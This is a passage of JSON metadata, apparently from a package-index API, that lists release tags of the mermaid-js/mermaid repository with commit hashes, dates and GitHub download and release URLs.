ags/mermaid@11.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.0.2/manifests"},{"name":"@mermaid-js/layout-elk@0.1.1","sha":"158f9925cedd6e1a205635bd1b45e6dd58cac5f6","kind":"tag","published_at":"2024-08-24T07:06:16.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.1/manifests"},{"name":"@mermaid-js/parser@0.2.0","sha":"158f9925cedd6e1a205635bd1b45e6dd58cac5f6","kind":"tag","published_at":"2024-08-24T07:06:16.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/parser@0.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/parser@0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fparser%400.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.2.0/manifests"},{"name":"mermaid@11.0.1","sha":"4d10e3f2586fb8b08b72d93a1036a17d53153997","kind":"tag","published_at":"2024-08-23T15:04:26.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.0.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.0.1/manifests"},{"name":"v11.0.0","sha":"2cfdd1620a8ceef37c0b738569dfb8bcc0005547","kind":"commit","published_at":"2024-08-23T12:07:47.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v11.0.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v11.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v11.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v11.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v11.0.0/manifests"},{"name":"v10.9.1","sha":"dab26df9c4ca69cc4a8c46a22286a2f63ea9ed3e","kind":"commit","published_at":"2024-05-14T10:55:39.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.9.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.1/manifests"},{"name":"v10.9.0","sha":"da33867ad798872d9f8406532263ff5e569f1185","kind":"commit","published_at":"2024-03-05T17:22:07.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.9.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.0/manifests"},{"name":"v10.8.0","sha":"51e7444b94ab0b872eaabc3b138184b47442fab4","kind":"commit","published_at":"2024-02-02T10:10:42.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.8.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.8.0/manifests"},{"name":"v10.7.0","sha":"dc857f804e955484b2f92cefc0aaa7b4afb159c4","kind":"commit","published_at":"2024-01-15T09:17:03.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.7.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.7.0/manifests"},{"name":"v10.6.1","sha":"65daab2aaf8fc3e54f34b2d468d19486034e06c7","kind":"commit","published_at":"2023-11-06T13:57:01.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.6.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.6.1/manifests"},{"name":"v10.6.0","sha":"29942c04dc92a64f8c618d6d55f9b57800341cf5","kind":"commit","published_at":"2023-10-25T09:07:12.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.6.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.6.0/manifests"},{"name":"v10.5.1","sha":"b70959daa7666d25416ab3c4b89ffbc328927d20","kind":"commit","published_at":"2023-10-20T12:30:52.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.5.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.5.1/manifests"},{"name":"v10.5.0","sha":"bb0d549d0dc489767b240a910a6831b4a7771fd2","kind":"commit","published_at":"2023-10-02T08:00:13.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.5.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.5.0/manifests"},{"name":"v10.4.0","sha":"8e5275d8441def82597db534f5a15b27cc6376a7","kind":"commit","published_at":"2023-08-25T12:19:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.4.0/manifests"},{"name":"v10.3.1","sha":"a0b80f5490f812ccbc74d6246f2ecc39b03db147","kind":"commit","published_at":"2023-08-11T12:03:56.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.3.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.3.1/manifests"},{"name":"v10.3.0","sha":"165e0b6c6862e183c9bdb75fbc5839555bbc99d0","kind":"commit","published_at":"2023-07-26T07:49:15.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.3.0/manifests"},{"name":"v10.2.4","sha":"453b337e6e0e6f02357293764c27c29c236fe848","kind":"commit","published_at":"2023-06-30T11:10:22.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.2.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.4/manifests"},{"name":"v10.2.3","sha":"75f9de3d4ae79b8939607872fa9467d5413855ff","kind":"commit","published_at":"2023-06-08T14:24:25.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.2.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.3/manifests"},{"name":"v10.2.2","sha":"d2409dc1638f1e8c3d006a3350b598d69d2f7a50","kind":"commit","published_at":"2023-06-02T06:50:59.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.2.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.2/manifests"},{"name":"v10.2.1","sha":"48e5d743b3bb0264390644b0d054850d821097e5","kind":"commit","published_at":"2023-06-01T11:03:14.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.1/manifests"},{"name":"v10.2.0","sha":"8d43b87200ba0b59f6800942e03154dccc6b57b7","kind":"commit","published_at":"2023-05-24T17:03:22.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.0/manifests"},{"name":"v10.1.0","sha":"e7c237dcf3062cd6163e129aedc620ef08d6f89a","kind":"commit","published_at":"2023-04-04T13:19:15.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.1.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.1.0/manifests"},{"name":"v9.4.3","sha":"1a7b8d38970f367e273b61599e6c4f75a8635158","kind":"commit","published_at":"2023-03-07T18:00:44.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.4.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.3/manifests"},{"name":"v9.4.2","sha":"c965e4c4564441975b71f0996e3a7ec2167ae21d","kind":"commit","published_at":"2023-03-07T15:50:32.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.4.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.2/manifests"},{"name":"v10.0.2","sha":"20298d243ad1bf0447800a3ec24851d6bac8b6fa","kind":"commit","published_at":"2023-03-02T12:45:56.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.0.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.2/manifests"},{"name":"v10.0.1","sha":"4a9d96aaba6c5a1ebb295d085b421d9102d83e96","kind":"commit","published_at":"2023-03-01T13:04:03.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.0.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.1/manifests"},{"name":"v10.0.0","sha":"555d4f2cdc83ebeaf0b41f57a05722ffb6d921af","kind":"commit","published_at":"2023-02-21T07:57:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.0.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.0/manifests"},{"name":"v9.4.0","sha":"97614b8af56a122022a71267996c0646b4a1e312","kind":"commit","published_at":"2023-02-15T14:54:02.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.0/manifests"},{"name":"v9.3.0","sha":"5735efacbe58634dcff91317170be2e010b7283e","kind":"commit","published_at":"2022-12-15T09:16:12.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.3.0/manifests"},{"name":"v9.2.2","sha":"9bb0ed2040cce9be83c63e097e26e4b361a8bdd6","kind":"commit","published_at":"2022-11-09T14:54:39.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.2.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.2/manifests"},{"name":"v9.2.1","sha":"ba7f83019f06d092a4549b98ebc97679fda196a8","kind":"commit","published_at":"2022-11-08T14:25:05.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.1/manifests"},{"name":"v9.2.0","sha":"e78ac9b92a75223df728b4a1866a8d7d460a4691","kind":"commit","published_at":"2022-11-01T14:27:20.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.0/manifests"},{"name":"v9.1.7","sha":"0c0468123fa1ca08baf69716eeca0b8872075b5e","kind":"commit","published_at":"2022-09-13T17:55:34.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.1.7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.1.7/manifests"},{"name":"9.1.6","sha":"a89b6fd0549a91fb09e72c4e40decf5a0b866828","kind":"commit","published_at":"2022-08-18T17:57:58.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.6/manifests"},{"name":"9.1.5","sha":"af8a5cbbfac33c54d4b1615611fdcc7575180ef1","kind":"commit","published_at":"2022-08-11T18:29:15.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.5/manifests"},{"name":"9.1.4","sha":"4dcf7feec02ed40e86ff23f78430e1074b6d5ab6","kind":"commit","published_at":"2022-08-04T18:25:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.4/manifests"},{"name":"9.1.3","sha":"1509ee68bede6c6dc12bcc196d54b89f3b97ac4a","kind":"tag","published_at":"2022-06-28T18:03:42.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.3/manifests"},{"name":"9.1.2","sha":"3b8d74f1f9be198617491809535158bdc83c2ed2","kind":"tag","published_at":"2022-06-14T17:31:19.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.2/manifests"},{"name":"9.1.1","sha":"5a9ec30803398464688f7e460fc66a008814d7a2","kind":"tag","published_at":"2022-05-11T12:29:16.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.1/manifests"},{"name":"9.1.0","sha":"8889b05d29442062c9162458fa595d5abd3903d4","kind":"tag","published_at":"2022-05-10T16:46:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.0/manifests"},{"name":"9.0.1","sha":"179584b4bbfd3738d51021272819e48648b30614","kind":"tag","published_at":"2022-04-21T20:06:16.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.0.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.0.1/manifests"},{"name":"9.0.0","sha":"f72d3c43723c30ba1eec825d97e46fae84e5b502","kind":"tag","published_at":"2022-04-07T18:47:11.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.0.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.0.0/manifests"},{"name":"8.14.0","sha":"cbe3a9159db4d5e67d270fe701cd63de1510f6ee","kind":"tag","published_at":"2022-02-10T17:57:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.14.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.14.0/manifests"},{"name":"8.13.11","sha":"3877b88e6e1dba5d3e52ea23fad66d0545ec5ab0","kind":"commit","published_at":"2022-02-10T16:10:44.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.11","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.11/manifests"},{"name":"8.13.10","sha":"2de2cb64f8d0fa6917e0fae071c0a03bba10df83","kind":"commit","published_at":"2022-01-22T09:11:06.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.10","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.10/manifests"},{"name":"8.13.9","sha":"77f2a57155cfd9375eb0f633d365b6bd75c31158","kind":"commit","published_at":"2022-01-16T14:28:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid